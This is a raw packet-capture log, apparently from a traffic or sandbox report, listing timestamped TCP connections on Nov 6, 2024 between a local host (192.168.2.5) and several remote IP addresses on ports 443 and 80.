                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.072503090 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.072520018 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.072801113 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.121826887 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.143336058 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.143398046 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.143508911 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276185989 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276233912 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276266098 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276290894 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276349068 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276374102 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276387930 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276390076 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.276437044 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.291520119 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.291532993 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.291579008 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.291584015 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.678674936 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.678704977 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.678782940 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.679091930 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.679109097 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.289403915 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.289556026 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.291188002 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.291196108 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.291451931 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.293051958 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.293087006 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:59.293137074 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047527075 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047588110 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047620058 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047672033 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047681093 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047693014 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047720909 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047748089 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047789097 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047800064 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047868013 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047907114 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.047914982 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.090562105 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.090569973 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.137450933 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.164657116 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.164730072 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.164766073 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.164784908 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.164797068 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.164855957 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165158033 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165309906 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165363073 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165416002 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165435076 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165447950 CET49705443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.165452957 CET44349705104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.292324066 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.292351007 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.292437077 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.292834997 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.292849064 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.911720037 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.911891937 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.913398981 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.913408041 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.913676977 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.915497065 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.915642023 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:00.915674925 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.539690971 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.539799929 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.539869070 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.540117025 CET49706443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.540132046 CET44349706104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.682271004 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.682311058 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.682399988 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.682760954 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:01.682776928 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.291160107 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.291289091 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.292829037 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.292834997 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.293077946 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.294452906 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.294590950 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.294621944 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.294723988 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.294729948 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.418720961 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.418721914 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.543761015 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.862509012 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.862621069 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.862698078 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.862755060 CET49707443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:02.862770081 CET44349707104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.062438011 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.062501907 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.062588930 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.062946081 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.062959909 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.773627996 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.773730993 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.967740059 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.967777014 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.968158007 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.969676971 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.969832897 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.969857931 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.969923019 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:03.969928980 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:04.322227955 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:04.322361946 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:39:05.913489103 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:05.913593054 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:05.913650990 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:05.913753033 CET49708443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:05.913775921 CET44349708104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.331510067 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.331545115 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.331629038 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.332015991 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.332031965 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.941015959 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.941112041 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.942641973 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.942651987 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.942914009 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.944214106 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.944331884 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:06.944338083 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:08.243360996 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:08.243463993 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:08.243587971 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:08.243751049 CET49709443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:08.243767023 CET44349709104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.027987003 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.028060913 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.028176069 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.028532982 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.028558969 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.746900082 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.747026920 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.749336004 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.749350071 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.749598980 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.750852108 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.751621962 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.751647949 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.751744986 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.751768112 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.751879930 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.751900911 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752023935 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752036095 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752182961 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752196074 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752360106 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752374887 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752382994 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752635002 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.752650976 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762058973 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762207985 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762224913 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762247086 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762254000 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762259007 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762377024 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762411118 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.762434006 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.767016888 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.767105103 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:09.767113924 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:13.158411026 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:13.158447981 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:13.158524036 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:13.166518927 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:13.166534901 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.280354023 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.280428886 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.282561064 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.282569885 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.282810926 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.314177036 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.314274073 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.314322948 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.314610958 CET49710443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.314630032 CET44349710104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.325005054 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.378575087 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.378592014 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.378659010 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.379270077 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:14.379285097 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.001440048 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.001513958 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.003040075 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.003047943 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.003298044 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.004664898 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.004698038 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.004735947 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.021380901 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.067334890 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393502951 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393527985 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393536091 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393546104 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393582106 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393610954 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393627882 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393656969 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.393682957 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.394368887 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.394428015 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.394433022 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.434389114 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.516678095 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.516725063 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:15.516797066 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.026743889 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.026777029 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.026794910 CET49711443192.168.2.54.175.87.197
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.026802063 CET443497114.175.87.197192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.414932966 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.415036917 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.415287971 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.415328026 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.415340900 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.415354013 CET49714443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.415359020 CET44349714104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.418731928 CET4971880192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.423594952 CET8049718185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.423688889 CET4971880192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.423954010 CET4971880192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:16.428749084 CET8049718185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.247508049 CET4971880192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.251410007 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.256381989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.256668091 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.258069038 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:17.262871981 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.098198891 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.098231077 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.098309994 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.098632097 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.098644972 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.185947895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.185970068 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.185981989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186026096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186038971 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186058044 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186070919 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186094999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186106920 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186119080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186162949 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186162949 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.186162949 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.188085079 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.191031933 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.191046953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.191056967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.191098928 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.343193054 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.343283892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.343319893 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.343333006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.343344927 CET8049719185.215.113.16192.168.2.5
